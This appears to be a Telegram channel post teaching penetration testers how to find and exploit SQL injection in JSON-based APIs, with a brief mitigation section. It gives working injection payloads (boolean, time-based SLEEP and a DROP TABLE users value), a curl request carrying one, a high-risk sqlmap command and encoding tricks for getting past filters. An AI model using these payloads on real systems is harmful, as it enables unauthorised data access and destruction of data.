ExploitQuest

A Real-World Example of Prototype Pollution Exploitation A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype…

💻

Advanced Guide to SQL Injection in APIs and JSON Endpoints

🧠 Introduction
In the modern web, APIs are everywhere — powering everything from web apps and mobile apps to IoT devices. However, developers often make the same classic mistakes when handling user input, especially in JSON-based RESTful APIs.

SQL Injection (SQLi), a well-known vulnerability, is still relevant and can exist within APIs if input validation and query handling are not properly secured.

This article explores advanced techniques for identifying and exploiting SQL injection in APIs, particularly in JSON payloads. It is tailored for penetration testers and bug bounty hunters seeking to level up their API testing game.

━━━━━━━━━━━━━━━

🔎

Finding SQLi in JSON APIs

📍

Where to Look

•POST requests with JSON bodies

•GraphQL endpoints

•PUT/PATCH methods with nested objects

•Endpoints with dynamic filters or search queries

🔍

Signs of Vulnerability

•Database-related error messages in API responses

•Unusual delays in response (time-based blind SQL)

•Reflection of user input in responses or logs

•Status code anomalies (e.g., 500 Internal Server Error)

━━━━━━━━━━━━━━━

🤡

Exploiting SQLi in JSON Payloads

Let’s say you’re testing the following API

POST /api/user/details HTTP/1.1
Host: vulnerable.site
Content-Type: application/json

{
  "username": "admin"
}

Try payload injection:

{
  "username": "' OR '1'='1"
}

🤖Or blind time-based:

{
  "username": "' OR SLEEP(5)--"
}

🤜

If the server response is delayed by 5 seconds, you’ve got a time-based blind SQLi.

🧪

Example Using curl

curl -X POST https://vulnerable.site/api/user/details \
  -H "Content-Type: application/json" \
  -d '{"username": "' OR 1=1 --"}'

🤜

Another JSON structure:

{
  "filter": {
    "email": "admin@site.com' OR '1'='1"
  }
}

Or nested objects:


{
  "user": {
    "id": "1'; DROP TABLE users;--"
  }
}

🔏

Tools You Can Use

•Burp Suite (Pro): Use the Intruder or Repeater to fuzz JSON payloads.

•SQLMap with --data and --json flags:

sqlmap -u https://vulnerable.site/api/login \
  --data '{"user":"admin","pass":"pass"}' \
--headers="Content-Type: application/json" \
  --level=5 --risk=3 --batch

•Postman: Manual testing and injection

•Nuclei with custom templates

━━━━━━━━━━━━━━━━━━

🧠 Tips for Advanced Hunters
Always analyze API docs (Swagger/OpenAPI) for parameter hints.

•Use Burp Collaborator for detecting out-of-band SQLi.

•Test for second-order injection, especially in multi-step flows.

•Try JSON-specific encoding, like:

•Unicode: \u0027 OR \u0031=\u0031

•Base64 in API params

━━━━━━━━━━━━━━━━━━

🛡️ Mitigation (For Blue Team Awareness)
Use parameterized queries / prepared statements

•Sanitize and validate input rigorously

•Apply WAF rules and anomaly detection for API behavior

•Implement rate limiting and access control

━━━━━━━━━━━━━━━━━━

😎Final Thoughts
SQL Injection is far from dead — it's just evolving. Modern APIs, especially those handling complex JSON bodies, often become attack vectors due to developer assumptions or insecure ORM usage. With the right mindset, tools, and techniques, ethical hackers can uncover and responsibly disclose serious vulnerabilities before attackers do.

🔡That's all, friends!
Happy hacking and see you next time!

🎁

#CyberSecurity #MSSQL #EthicalHacking #json
#api
#JavaScriptSecurity
#WebSecurity
#BugBounty #EthicalHacking #CyberSecurity
#SecurityResearch #WebHacking

Please open Telegram to view this post

VIEW IN TELEGRAM

❤9👍2🥰1

3.31K viewsedited 07:38

About

Blog

Apps

Platform